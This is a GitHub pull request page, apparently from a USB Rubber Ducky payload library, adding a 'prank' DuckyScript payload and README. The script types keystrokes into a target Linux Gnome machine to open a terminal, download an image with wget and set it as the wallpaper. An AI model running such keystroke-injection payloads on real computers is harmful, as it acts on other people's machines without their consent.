Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

New payload - change gnome wallpaper #225

Merged
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
12 changes: 12 additions & 0 deletions payloads/library/prank/Change-Gnome-wallpaper/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
# Change Gnome wallpaper

A payload for changing the targets wallpaper on Gnome
**Category:** Prank

## Dependencies
- Linux Gnome
- Internet connection

## Settings
- `DUCKY_LANG` make sure to chose your targets keyboard layout
- `#LINK` the image url of the wallpaper to set (by default its [this](https://pbs.twimg.com/tweet_video_thumb/GLJE0kIWkAE_ohg.jpg))
28 changes: 28 additions & 0 deletions payloads/library/prank/Change-Gnome-wallpaper/payload.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
REM ###############################################
REM # |
REM # Title : Change Gnome wallpaper |
REM # Author : simen64 |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Linux Gnome |
REM # |
REM ###############################################

REM Requirements:
REM - Internet Connection

REM Change this to your keyboard layout
DUCKY_LANG NO

DELAY 1000
CAPSLOCK_DISABLE

REM put the link to your image here:
DEFINE #LINK https://pbs.twimg.com/tweet_video_thumb/GLJE0kIWkAE_ohg.jpg

ALT F2
DELAY 100
STRINGLN xterm
DELAY 500

STRINGLN wget -O /var/tmp/w.png #LINK && gsettings set org.gnome.desktop.background picture-uri-dark 'file:///var/tmp/w.png' && gsettings set org.gnome.desktop.background picture-uri 'file:///var/tmp/w.png' && exit